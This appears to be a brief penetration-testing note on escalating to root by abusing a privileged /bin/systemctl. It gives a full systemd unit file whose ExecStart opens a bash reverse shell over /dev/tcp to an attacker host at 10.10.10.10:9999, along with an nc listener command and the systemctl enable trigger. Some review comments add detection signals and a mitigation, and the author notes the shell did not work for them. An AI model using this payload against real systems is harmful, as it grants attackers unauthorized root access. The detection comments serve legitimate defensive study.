/bin/systemctl

I tried this one in practice but could not get a reverse shell.

# Craft a payload called root.service and serve it from /tmp on the Kali host (10.10.10.10)

# systemd unit file for a service named by the notes as root.service.
[Unit]
Description=roooooooooot

[Service]
Type=simple
# The service process is run as root by the system manager.
User=root
# ExecStart starts an interactive bash whose stdout/stderr are redirected to
# bash's /dev/tcp pseudo-device for 10.10.10.10:9999, with stdin duplicated
# from the same connection.
# Detection: a service whose ExecStart spawns a shell with a /dev/tcp
# redirection, or a unit file that lives in a world-writable directory,
# is worth alerting on; outbound connections from a systemd-spawned bash
# are a second signal.
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
# Ties the unit to multi-user.target when it is enabled.
WantedBy=multi-user.target

# Use wget to download the file into any writable directory on the target

# Set up a listener on the Kali host, port 9999
# (-l listen, -p 9999 local port, -n skip DNS lookups, -v verbose)

nc -nvlp 9999

# Trigger the reverse shell with:

# Review note: this step depends on the caller already being able to run
# /bin/systemctl with root privileges; the page does not say how that is
# granted (presumably a SUID bit or a sudo rule on systemctl; confirm).
# Removing that grant is the mitigation. For detection, audit systemctl
# invocations that reference unit files under /tmp or other world-writable
# directories.
/bin/systemctl enable /tmp/root.service
